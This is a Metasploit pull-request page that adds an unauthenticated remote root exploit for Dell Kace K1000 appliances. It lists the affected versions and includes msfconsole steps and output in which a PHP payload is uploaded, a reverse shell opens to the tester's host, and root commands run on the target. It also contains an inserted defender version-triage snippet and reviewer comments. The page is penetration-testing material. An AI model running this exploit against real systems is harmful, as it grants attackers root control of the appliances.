Add Dell Kace K1000 unauthenticated remote root exploit #6773

Merged
merged 1 commit into from Apr 13, 2016

@bcoles
Contributor
bcoles commented Apr 12, 2016

Add Dell Kace K1000 unauthenticated remote root exploit for versions 5.0 to 5.3, 5.4 prior to 5.4.76849 and 5.5 prior to 5.5.90547.

Verification

  • Use your Dell Support user account to locate and download the outdated and vulnerable K1000 trial appliance.
  • $ msfconsole
  • > use exploit/unix/http/dell_kace_k1000_upload
  • > set rhost <rhost>
  • > set verbose true
  • > check
  • > run
  • > id

Output

msf > use exploit/unix/http/dell_kace_k1000_upload 
msf exploit(dell_kace_k1000_upload) > show options

Module options (exploit/unix/http/dell_kace_k1000_upload):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                     yes       The target address
   RPORT    80               yes       The target port
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(dell_kace_k1000_upload) > set rhost 192.168.18.123
rhost => 192.168.18.123
msf exploit(dell_kace_k1000_upload) > set verbose true
verbose => true
msf exploit(dell_kace_k1000_upload) > check

[*] Found Dell KACE K1000 version 5.3.53053
[+] The target is vulnerable.
msf exploit(dell_kace_k1000_upload) > run

[*] Started reverse TCP handler on 192.168.18.160:4444 
[*] Uploading .pKWbnhT43Wh.php (620 bytes)
[+] Payload uploaded successfully
[*] Command shell session 1 opened (192.168.18.160:4444 -> 192.168.18.123:51317) at 2016-04-12 11:44:13 -0400
[+] Payload executed successfully

id 
uid=0(root) gid=0(wheel) groups=0(wheel)
pwd
/
uname -a
FreeBSD kbox 7.0-STABLE FreeBSD 7.0-STABLE #0: Thu May  1 14:53:40 UTC 2008     tom@beavis.tomwhit.org:/usr/obj/usr/src/sys/KBOX1200  amd64
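
For defenders triaging an appliance inventory, the affected ranges given in the description above can be checked mechanically. This is an added example, not part of the pull request or the Metasploit module; the `major.minor.build` version format is assumed from the `check` output, and the hostnames and the 6.x version are constructed.

```ruby
require 'rubygems' # provides Gem::Version for numeric segment comparison

# Affected ranges as stated in the PR description:
#   5.0 to 5.3 (every build), 5.4 before 5.4.76849, 5.5 before 5.5.90547.
ALL_BUILDS_AFFECTED = %w[5.0 5.1 5.2 5.3].freeze
FIRST_FIXED_BUILD = {
  '5.4' => Gem::Version.new('5.4.76849'),
  '5.5' => Gem::Version.new('5.5.90547')
}.freeze

# Returns :affected, :not_listed (outside the ranges the PR names) or
# :unparseable. Assumes major.minor.build strings such as "5.3.53053".
def k1000_status(version_string)
  v = version_string.to_s.strip
  return :unparseable unless v.match?(/\A\d+\.\d+\.\d+\z/)

  branch = v.split('.').first(2).join('.')
  return :affected if ALL_BUILDS_AFFECTED.include?(branch)

  fixed = FIRST_FIXED_BUILD[branch]
  return :affected if fixed && Gem::Version.new(v) < fixed

  :not_listed
end

# Groups hostnames by status so affected appliances can be patched first.
def triage(inventory)
  inventory.group_by { |_host, version| k1000_status(version) }
           .transform_values { |pairs| pairs.map(&:first) }
end

# Constructed inventory; hostnames are made up.
SAMPLE_INVENTORY = {
  'kbox-lab'   => '5.3.53053',  # version shown in the check output above
  'kbox-hq'    => '5.4.70402',  # trial version named in this thread
  'kbox-dr'    => '5.5.90547',  # first 5.5 build outside the stated range
  'kbox-new'   => '6.0.101863', # constructed version
  'kbox-stale' => 'unknown'
}.freeze

if __FILE__ == $PROGRAM_NAME
  triage(SAMPLE_INVENTORY).each { |status, hosts| puts "#{status}: #{hosts.join(', ')}" }
end
```

`:not_listed` means only that the version falls outside the ranges this pull request names, not that the appliance has been verified as patched.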

@wvu-r7
Contributor
wvu-r7 commented Apr 12, 2016

Yay, FreeBSD. :)

@wchen-r7
Contributor

@bcoles Is there a virtual appliance that I can download and test? It looks like I can only test their lab machine.

@bcoles
Contributor
bcoles commented Apr 13, 2016

@wchen-r7 You can download a trial in OVF format from the Support portal.

These versions are likely vulnerable:

  • hxxps://support.software.dell.com/k1000-systems-management-appliance/5.3.47927
  • hxxps://support.software.dell.com/k1000-systems-management-appliance/5.4.70402

@wchen-r7
Contributor

A valid support Maintenance contract is required to download the old versions. Fortunately we have a pcap, so we can land this. Thanks @bcoles

@wchen-r7
Contributor

Code looks good. I will land it.

@wchen-r7 wchen-r7 self-assigned this Apr 13, 2016
@wchen-r7 wchen-r7 merged commit b61175c into rapid7:master Apr 13, 2016

1 check passed

continuous-integration/travis-ci/pr The Travis CI build passed
@wchen-r7 wchen-r7 added a commit that referenced this pull request Apr 13, 2016
@wchen-r7 wchen-r7 Land #6773, Add Dell Kace K1000 unauthenticated remote root exploit c52a639
@bcoles bcoles deleted the bcoles:dell_kace_k1000_upload branch Apr 22, 2016
@h00die h00die referenced this pull request Jun 8, 2016
Closed

PoC for Dell KACE K1000 #5128